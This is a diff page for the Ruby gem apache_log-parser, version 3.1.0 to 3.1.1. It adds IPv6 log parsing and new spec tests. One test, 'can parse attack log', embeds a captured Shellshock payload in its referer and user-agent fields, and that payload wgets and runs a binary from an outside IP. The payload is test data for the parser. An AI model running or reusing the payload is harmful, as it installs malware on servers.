apache_log-parser 3.1.0 → 3.1.1
Sign up to get free protection for your applications and to get access to all the features.
- checksums.yaml +4 -4
- data/lib/apache_log/parser/version.rb +1 -1
- data/lib/apache_log/parser.rb +2 -2
- data/spec/apache_log/parser_spec.rb +19 -0
- metadata +2 -2
checksums.yaml
CHANGED
@@ -1,7 +1,7 @@
|
|
1
1
|
---
|
2
2
|
SHA1:
|
3
|
-
metadata.gz:
|
4
|
-
data.tar.gz:
|
3
|
+
metadata.gz: 059d6f42a9d78d8cfdb3b4245dc5bb7038b52e6b
|
4
|
+
data.tar.gz: 9843f3196f886414b7c7ee784669b0b26b367c6e
|
5
5
|
SHA512:
|
6
|
-
metadata.gz:
|
7
|
-
data.tar.gz:
|
6
|
+
metadata.gz: 0e54be8c7eee30b4d7abdc5fea023f9c88cd8917d2ff472ea74d6214bf8919f8c68a3915d8eb561de3e1d09da4300f1dd63fdd90e7a6883024f02308e42223d0
|
7
|
+
data.tar.gz: 577b92735e5c908b20953bfc2729777489b5f58e72517054d39674498926bf630f37559d1c595f126b4b3eba9ce467515de0f3a17c2dfe9ff3399de039873786
|
data/lib/apache_log/parser.rb
CHANGED
@@ -7,8 +7,8 @@ module ApacheLog
|
|
7
7
|
common_fields = %w(remote_host identity_check user datetime request status size)
|
8
8
|
combined_fields = common_fields + %w(referer user_agent)
|
9
9
|
|
10
|
-
common_pattern = '(
|
11
|
-
combined_pattern = common_pattern + '\s+"([
|
10
|
+
common_pattern = '(?:^|\s)((?:\d{1,3}\.\d{1,3}\.\d{1,3}\.\d{1,3})|(?:[\w:]+?))\s+(\S+)\s+(\S+)\s+\[(\d{2}\/.*\d{4}:\d{2}:\d{2}:\d{2}\s.*)\]\s+"(.*?)"\s+(\S+)\s+(\S+)'
|
11
|
+
combined_pattern = common_pattern + '\s+"(.*?[^\\\\])"\s+"(.*?[^\\\\])"'
|
12
12
|
additional_pattern = ''
|
13
13
|
|
14
14
|
additional_fields.each do
|
@@ -16,6 +16,15 @@ describe ApacheLog::Parser do
|
|
16
16
|
expect(entity).to eq(expect)
|
17
17
|
end
|
18
18
|
|
19
|
+
it 'can parse ipv6 common format log' do
|
20
|
+
line = '::1 - - [20/May/2014:20:04:04 +0900] "GET /test/indx.html HTTP/1.1" 200 4576'
|
21
|
+
parser = ApacheLog::Parser.new('common')
|
22
|
+
entity = parser.parse(line.chomp)
|
23
|
+
expect = {remote_host: '::1', identity_check: '-', user: '-', datetime: DateTime.new(2014, 5, 20, 20, 04, 04, 0.375),
|
24
|
+
request: {method: 'GET', path: '/test/indx.html', protocol: 'HTTP/1.1'}, status: '200', size: '4576'}
|
25
|
+
expect(entity).to eq(expect)
|
26
|
+
end
|
27
|
+
|
19
28
|
it 'can parse tab separated common format log' do
|
20
29
|
line = "192.168.0.1\t-\t-\t[07/Feb/2011:10:59:59 +0900]\t\"GET /x/i.cgi/net/0000/ HTTP/1.1\"\t200\t9891";
|
21
30
|
parser = ApacheLog::Parser.new('common')
|
@@ -45,6 +54,16 @@ describe ApacheLog::Parser do
|
|
45
54
|
expect(entity).to eq(expect)
|
46
55
|
end
|
47
56
|
|
57
|
+
it 'can parse attack log' do
|
58
|
+
line = '121.207.230.74 - - [13/Apr/2015:08:21:54 +0900] "GET / HTTP/1.1" 200 2392 "() { :; }; /bin/bash -c \"rm -rf /tmp/*;echo wget http://61.160.212.172:911/java -O /tmp/China.Z-orwj >> /tmp/Run.sh;echo echo By China.Z >> /tmp/Run.sh;echo chmod 777 /tmp/China.Z-orwj >> /tmp/Run.sh;echo /tmp/China.Z-orwj >> /tmp/Run.sh;echo rm -rf /tmp/Run.sh >> /tmp/Run.sh;chmod 777 /tmp/Run.sh;/tmp/Run.sh\"" "() { :; }; /bin/bash -c \"rm -rf /tmp/*;echo wget http://61.160.212.172:911/java -O /tmp/China.Z-orwj >> /tmp/Run.sh;echo echo By China.Z >> /tmp/Run.sh;echo chmod 777 /tmp/China.Z-orwj >> /tmp/Run.sh;echo /tmp/China.Z-orwj >> /tmp/Run.sh;echo rm -rf /tmp/Run.sh >> /tmp/Run.sh;chmod 777 /tmp/Run.sh;/tmp/Run.sh\""'
|
59
|
+
parser = ApacheLog::Parser.new('combined')
|
60
|
+
entity = parser.parse(line.chomp)
|
61
|
+
expect = {remote_host: '121.207.230.74', identity_check: '-', user: '-', datetime: DateTime.new(2015, 4, 13, 8,21,54, 0.375),
|
62
|
+
request: {method: 'GET', path: '/', protocol: 'HTTP/1.1' }, status: '200', size: '2392', referer: '() { :; }; /bin/bash -c \"rm -rf /tmp/*;echo wget http://61.160.212.172:911/java -O /tmp/China.Z-orwj >> /tmp/Run.sh;echo echo By China.Z >> /tmp/Run.sh;echo chmod 777 /tmp/China.Z-orwj >> /tmp/Run.sh;echo /tmp/China.Z-orwj >> /tmp/Run.sh;echo rm -rf /tmp/Run.sh >> /tmp/Run.sh;chmod 777 /tmp/Run.sh;/tmp/Run.sh\"',
|
63
|
+
user_agent: '() { :; }; /bin/bash -c \"rm -rf /tmp/*;echo wget http://61.160.212.172:911/java -O /tmp/China.Z-orwj >> /tmp/Run.sh;echo echo By China.Z >> /tmp/Run.sh;echo chmod 777 /tmp/China.Z-orwj >> /tmp/Run.sh;echo /tmp/China.Z-orwj >> /tmp/Run.sh;echo rm -rf /tmp/Run.sh >> /tmp/Run.sh;chmod 777 /tmp/Run.sh;/tmp/Run.sh\"'}
|
64
|
+
expect(entity).to eq(expect)
|
65
|
+
end
|
66
|
+
|
48
67
|
it 'can parse tab separated combined format log' do
|
49
68
|
line = "192.168.0.1\t-\t-\t[07/Feb/2011:10:59:59 +0900]\t\"GET /x/i.cgi/movie/0001/-0002 HTTP/1.1\"\t200\t14462\t\"-\"\t\"DoCoMo/2.0 F08A3(c500;TB;W30H20)\"";
|
50
69
|
parser = ApacheLog::Parser.new('combined')
|
metadata
CHANGED
@@ -1,14 +1,14 @@
|
|
1
1
|
--- !ruby/object:Gem::Specification
|
2
2
|
name: apache_log-parser
|
3
3
|
version: !ruby/object:Gem::Version
|
4
|
-
version: 3.1.
|
4
|
+
version: 3.1.1
|
5
5
|
platform: ruby
|
6
6
|
authors:
|
7
7
|
- Yuichi Takada
|
8
8
|
autorequire:
|
9
9
|
bindir: bin
|
10
10
|
cert_chain: []
|
11
|
-
date: 2015-
|
11
|
+
date: 2015-04-18 00:00:00.000000000 Z
|
12
12
|
dependencies:
|
13
13
|
- !ruby/object:Gem::Dependency
|
14
14
|
name: bundler
|